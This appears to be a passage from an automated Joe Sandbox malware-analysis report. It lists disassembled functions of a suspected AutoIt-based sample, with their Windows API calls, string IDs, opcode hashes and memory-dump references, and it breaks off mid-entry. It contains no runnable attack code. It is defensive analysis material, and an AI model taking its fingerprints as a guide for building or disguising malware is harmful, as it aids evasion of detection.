                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                  • String ID: ($0$tooltips_class32
                                                  • API String ID: 698492251-4156429822
                                                  • Opcode ID: 24400f2fbef79c9b39042847ffb35f3115dfc7ebb810a2bb07ab53e5d0cb276c
                                                  • Instruction ID: e5961cf3e48ee9b700e02b959159329516398db1553abb44a641eed4571153c7
                                                  • Opcode Fuzzy Hash: 24400f2fbef79c9b39042847ffb35f3115dfc7ebb810a2bb07ab53e5d0cb276c
                                                  • Instruction Fuzzy Hash: 05B17A71608340AFDB08DF65C889B6ABBE4FF88310F00891CF5A99B2A1D771ED45CB95
                                                  Function 00C5449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00C544AC
                                                  • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00C544D2
                                                  • _wcscpy.LIBCMT ref: 00C54500
                                                  • _wcscmp.LIBCMT ref: 00C5450B
                                                  • _wcscat.LIBCMT ref: 00C54521
                                                  • _wcsstr.LIBCMT ref: 00C5452C
                                                  • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00C54548
                                                  • _wcscat.LIBCMT ref: 00C54591
                                                  • _wcscat.LIBCMT ref: 00C54598
                                                  • _wcsncpy.LIBCMT ref: 00C545C3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                  • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                  • API String ID: 699586101-1459072770
                                                  • Opcode ID: 0436895d88d51303886eccf68dfefd58b4a78318654a6b2c676f99f64076437c
                                                  • Instruction ID: 6b16daee14d45e8f57e572e2a20a03715dd812e2a3817485533fdaaa0fd11750
                                                  • Opcode Fuzzy Hash: 0436895d88d51303886eccf68dfefd58b4a78318654a6b2c676f99f64076437c
                                                  • Instruction Fuzzy Hash: 034103359002047BEB14AB75DC47FFF77ACDF42714F10006AF904A6182EA749AD2B6A9
                                                  Function 00BF27D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00BF28BC
                                                  • GetSystemMetrics.USER32(00000007), ref: 00BF28C4
                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00BF28EF
                                                  • GetSystemMetrics.USER32(00000008), ref: 00BF28F7
                                                  • GetSystemMetrics.USER32(00000004), ref: 00BF291C
                                                  • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00BF2939
                                                  • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00BF2949
                                                  • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00BF297C
                                                  • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00BF2990
                                                  • GetClientRect.USER32(00000000,000000FF), ref: 00BF29AE
                                                  • GetStockObject.GDI32(00000011), ref: 00BF29CA
                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00BF29D5
                                                    • Part of subcall function 00BF2344: GetCursorPos.USER32(?), ref: 00BF2357
                                                    • Part of subcall function 00BF2344: ScreenToClient.USER32(00CB57B0,?), ref: 00BF2374
                                                    • Part of subcall function 00BF2344: GetAsyncKeyState.USER32(00000001), ref: 00BF2399
                                                    • Part of subcall function 00BF2344: GetAsyncKeyState.USER32(00000002), ref: 00BF23A7
                                                  • SetTimer.USER32(00000000,00000000,00000028,00BF1256), ref: 00BF29FC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                  • String ID: AutoIt v3 GUI
                                                  • API String ID: 1458621304-248962490
                                                  • Opcode ID: 871e074377d76ff8caa264dcf2b3c517a75281d477bad361a94c09425905a148
                                                  • Instruction ID: 14b6de48b36d9e239f723d8e30f3416b76610f93ec22b494166bdd6dd4c5c6c3
                                                  • Opcode Fuzzy Hash: 871e074377d76ff8caa264dcf2b3c517a75281d477bad361a94c09425905a148
                                                  • Instruction Fuzzy Hash: 8AB16C71A4020AEFDB15DFA8DC95BAE7BF5FB08310F104229FA15A72E0DB74A951CB50
                                                  Function 00C4A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetClassNameW.USER32(?,?,00000100), ref: 00C4A47A
                                                  • __swprintf.LIBCMT ref: 00C4A51B
                                                  • _wcscmp.LIBCMT ref: 00C4A52E
                                                  • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00C4A583
                                                  • _wcscmp.LIBCMT ref: 00C4A5BF
                                                  • GetClassNameW.USER32(?,?,00000400), ref: 00C4A5F6
                                                  • GetDlgCtrlID.USER32(?), ref: 00C4A648
                                                  • GetWindowRect.USER32(?,?), ref: 00C4A67E
                                                  • GetParent.USER32(?), ref: 00C4A69C
                                                  • ScreenToClient.USER32(00000000), ref: 00C4A6A3
                                                  • GetClassNameW.USER32(?,?,00000100), ref: 00C4A71D
                                                  • _wcscmp.LIBCMT ref: 00C4A731
                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 00C4A757
                                                  • _wcscmp.LIBCMT ref: 00C4A76B
                                                    • Part of subcall function 00C1362C: _iswctype.LIBCMT ref: 00C13634
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                  • String ID: %s%u
                                                  • API String ID: 3744389584-679674701
                                                  • Opcode ID: 36f20fa03e50c39809a4743281ee1caf3d5a8913d72a7daba2fccfebdb3b2b8a
                                                  • Instruction ID: 4c329031c7b06ad0c457cd482a49b19bf87a1e840313d043eabee60bc40a771d
                                                  • Opcode Fuzzy Hash: 36f20fa03e50c39809a4743281ee1caf3d5a8913d72a7daba2fccfebdb3b2b8a
                                                  • Instruction Fuzzy Hash: 63A1B271244706BFDB14DF64C884BEAB7E8FF44354F008529F9A9D2190DB30EA96DB92
                                                  Function 00C4AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetClassNameW.USER32(00000008,?,00000400), ref: 00C4AF18
                                                  • _wcscmp.LIBCMT ref: 00C4AF29
                                                  • GetWindowTextW.USER32(00000001,?,00000400), ref: 00C4AF51
                                                  • CharUpperBuffW.USER32(?,00000000), ref: 00C4AF6E
                                                  • _wcscmp.LIBCMT ref: 00C4AF8C
                                                  • _wcsstr.LIBCMT ref: 00C4AF9D
                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 00C4AFD5
                                                  • _wcscmp.LIBCMT ref: 00C4AFE5
                                                  • GetWindowTextW.USER32(00000002,?,00000400), ref: 00C4B00C
                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 00C4B055
                                                  • _wcscmp.LIBCMT ref: 00C4B065
                                                  • GetClassNameW.USER32(00000010,?,00000400), ref: 00C4B08D
                                                  • GetWindowRect.USER32(00000004,?), ref: 00C4B0F6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                  • String ID: @$ThumbnailClass
                                                  • API String ID: 1788623398-1539354611
                                                  • Opcode ID: 523c29638d78e70615aeef247390bb3a1e884735425550b4fe883a834c0a9cc6
                                                  • Instruction ID: 0b4fd2acef9c858c4e26bf1e17cc5761a4d73302a34735ca88bc9a14d81f1df8
                                                  • Opcode Fuzzy Hash: 523c29638d78e70615aeef247390bb3a1e884735425550b4fe883a834c0a9cc6
                                                  • Instruction Fuzzy Hash: 7981A1711082059FDB15DF54C885FBA7BE8FF44714F04846AFDA98A092DB30DE8ACBA1
                                                  Function 00C4ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: __wcsnicmp
                                                  • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                  • API String ID: 1038674560-1810252412
                                                  • Opcode ID: 824dc71bc2674702d7e7c48ac2b2a93db0a426b39bad981866df8955436e9895
                                                  • Instruction ID: eb7923d71b3f0cc848065a432c6eef5dbf265187e9e2d646040c269b76a8bbdb
                                                  • Opcode Fuzzy Hash: 824dc71bc2674702d7e7c48ac2b2a93db0a426b39bad981866df8955436e9895
                                                  • Instruction Fuzzy Hash: 19318631A8820AB6DB14EB60DE53EFE77A4BF12714F6005A5F511720D1EF625F08E652
                                                  Function 00C64FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadCursorW.USER32(00000000,00007F8A), ref: 00C65013
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00C6501E
                                                  • LoadCursorW.USER32(00000000,00007F03), ref: 00C65029
                                                  • LoadCursorW.USER32(00000000,00007F8B), ref: 00C65034
                                                  • LoadCursorW.USER32(00000000,00007F01), ref: 00C6503F
                                                  • LoadCursorW.USER32(00000000,00007F81), ref: 00C6504A
                                                  • LoadCursorW.USER32(00000000,00007F88), ref: 00C65055
                                                  • LoadCursorW.USER32(00000000,00007F80), ref: 00C65060
                                                  • LoadCursorW.USER32(00000000,00007F86), ref: 00C6506B
                                                  • LoadCursorW.USER32(00000000,00007F83), ref: 00C65076
                                                  • LoadCursorW.USER32(00000000,00007F85), ref: 00C65081
                                                  • LoadCursorW.USER32(00000000,00007F82), ref: 00C6508C
                                                  • LoadCursorW.USER32(00000000,00007F84), ref: 00C65097
                                                  • LoadCursorW.USER32(00000000,00007F04), ref: 00C650A2
                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00C650AD
                                                  • LoadCursorW.USER32(00000000,00007F89), ref: 00C650B8
                                                  • GetCursorInfo.USER32(?), ref: 00C650C8
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Cursor$Load$Info
                                                  • String ID:
                                                  • API String ID: 2577412497-0
                                                  • Opcode ID: 39067da53347979c840223a663fe53295675d244bd51e0625acedfa266bf92da
                                                  • Instruction ID: 9c7a1a5c76b7958fd15ab3c0a7da5190cc8e3d61c538c2efae6c946ec7ca6290
                                                  • Opcode Fuzzy Hash: 39067da53347979c840223a663fe53295675d244bd51e0625acedfa266bf92da
                                                  • Instruction Fuzzy Hash: 6C3114B1D0831D6ADF209FB68C8996EBFE8FF04750F50452AE51CE7280DA78A5018F91
                                                  Function 00C7A1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C7A259
                                                  • DestroyWindow.USER32(?,?), ref: 00C7A2D3
                                                    • Part of subcall function 00BF7BCC: _memmove.LIBCMT ref: 00BF7C06
                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00C7A34D
                                                  • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00C7A36F
                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C7A382
                                                  • DestroyWindow.USER32(00000000), ref: 00C7A3A4
                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00BF0000,00000000), ref: 00C7A3DB
                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C7A3F4
                                                  • GetDesktopWindow.USER32 ref: 00C7A40D
                                                  • GetWindowRect.USER32(00000000), ref: 00C7A414
                                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00C7A42C
                                                  • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00C7A444
                                                    • Part of subcall function 00BF25DB: GetWindowLongW.USER32(?,000000EB), ref: 00BF25EC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                  • String ID: 0$tooltips_class32
                                                  • API String ID: 1297703922-3619404913
                                                  • Opcode ID: 1aab9ea92b5247853976efa5998bfc49d87b26d60c18a2d84b3462ffaf94324c
                                                  • Instruction ID: 88d788a1f8ac0b32bbd539c88de4c1cac653dff2898898981206e68e61e69399
                                                  • Opcode Fuzzy Hash: 1aab9ea92b5247853976efa5998bfc49d87b26d60c18a2d84b3462ffaf94324c
                                                  • Instruction Fuzzy Hash: 0971BD70140205AFD725DF28CC49F6E7BE5FB89704F04852DF999872A1CBB2EA46CB52
                                                  Function 00C7C5FE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BF2612: GetWindowLongW.USER32(?,000000EB), ref: 00BF2623
                                                  • DragQueryPoint.SHELL32(?,?), ref: 00C7C627
                                                    • Part of subcall function 00C7AB37: ClientToScreen.USER32(?,?), ref: 00C7AB60
                                                    • Part of subcall function 00C7AB37: GetWindowRect.USER32(?,?), ref: 00C7ABD6
                                                    • Part of subcall function 00C7AB37: PtInRect.USER32(?,?,00C7C014), ref: 00C7ABE6
                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00C7C690
                                                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00C7C69B
                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00C7C6BE
                                                  • _wcscat.LIBCMT ref: 00C7C6EE
                                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00C7C705
                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00C7C71E
                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00C7C735
                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00C7C757
                                                  • DragFinish.SHELL32(?), ref: 00C7C75E
                                                  • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00C7C851
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                  • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                  • API String ID: 169749273-3440237614
                                                  • Opcode ID: 4f6f23cc32c44266c13588bdddea080a4f5bd984e64e9ffd3f68e9192cbdeac7
                                                  • Instruction ID: 6143ce7c0667de72e28da13ae5dbb60177851712ff194e385f1b8d9618585f08
                                                  • Opcode Fuzzy Hash: 4f6f23cc32c44266c13588bdddea080a4f5bd984e64e9ffd3f68e9192cbdeac7
                                                  • Instruction Fuzzy Hash: FC615871108305AFC701EF64DC85EAFBBE8EF89750F00496EF699931A1DB709A49CB52
                                                  Function 00C74392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CharUpperBuffW.USER32(?,?), ref: 00C74424
                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C7446F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: BuffCharMessageSendUpper
                                                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                  • API String ID: 3974292440-4258414348
                                                  • Opcode ID: c6cac0e1178c6135018e8084715410c6f9aab796d907222bdad151fc7944f4c9
                                                  • Instruction ID: f3bd78dc8b76542ee9286d79c7864223f1ad956ff46cb3015b55e7e2419b0c3c
                                                  • Opcode Fuzzy Hash: c6cac0e1178c6135018e8084715410c6f9aab796d907222bdad151fc7944f4c9
                                                  • Instruction Fuzzy Hash: A79150702047019FCB08EF20C451A6EB7E1AF96394F1584ACF9A65B3A2CB71ED49EB51
                                                  Function 00C7B7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00C7B8B4
                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00C791C2), ref: 00C7B910
                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00C7B949
                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00C7B98C
                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00C7B9C3
                                                  • FreeLibrary.KERNEL32(?), ref: 00C7B9CF
                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00C7B9DF
                                                  • DestroyIcon.USER32(?,?,?,?,?,00C791C2), ref: 00C7B9EE
                                                  • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00C7BA0B
                                                  • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00C7BA17
                                                    • Part of subcall function 00C12EFD: __wcsicmp_l.LIBCMT ref: 00C12F86
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                  • String ID: .dll$.exe$.icl
                                                  • API String ID: 1212759294-1154884017
                                                  • Opcode ID: 7daba8d6dddc29d4b8106f92ffbd776a86f9c99d6a3c624c3e7b47111ed10ada
                                                  • Instruction ID: ef7205e2d6f232703bae90ef22d4a01a1249949f295e525c7afe75e404c86a04
                                                  • Opcode Fuzzy Hash: 7daba8d6dddc29d4b8106f92ffbd776a86f9c99d6a3c624c3e7b47111ed10ada
                                                  • Instruction Fuzzy Hash: 5A61CE71500209BAEB14DF64CC82FBE7BB8EB08711F108119FA29D61C0DB749E91DBA0
                                                  Function 00C5DC1A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLocalTime.KERNEL32(?), ref: 00C5DCDC
                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00C5DCEC
                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00C5DCF8
                                                  • __wsplitpath.LIBCMT ref: 00C5DD56
                                                  • _wcscat.LIBCMT ref: 00C5DD6E
                                                  • _wcscat.LIBCMT ref: 00C5DD80
                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C5DD95
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00C5DDA9
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00C5DDDB
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00C5DDFC
                                                  • _wcscpy.LIBCMT ref: 00C5DE08
                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00C5DE47
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                  • String ID: *.*
                                                  • API String ID: 3566783562-438819550
                                                  • Opcode ID: 744578f683e7d6ddad2c46461b344a2bf451a7428932c6a073ba896eb82fcf22
                                                  • Instruction ID: 424e5c9315f9fcec982417964a06da5cf060e25e4302773ddcf1e3d4a5a1b08f
                                                  • Opcode Fuzzy Hash: 744578f683e7d6ddad2c46461b344a2bf451a7428932c6a073ba896eb82fcf22
                                                  • Instruction Fuzzy Hash: 49617D765043059FCB20EF20C845EAEB3E8FF89314F04495DF99A87251DB71EA89CB96
                                                  Function 00C5A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                  Download Yara Rule
                                                  APIs
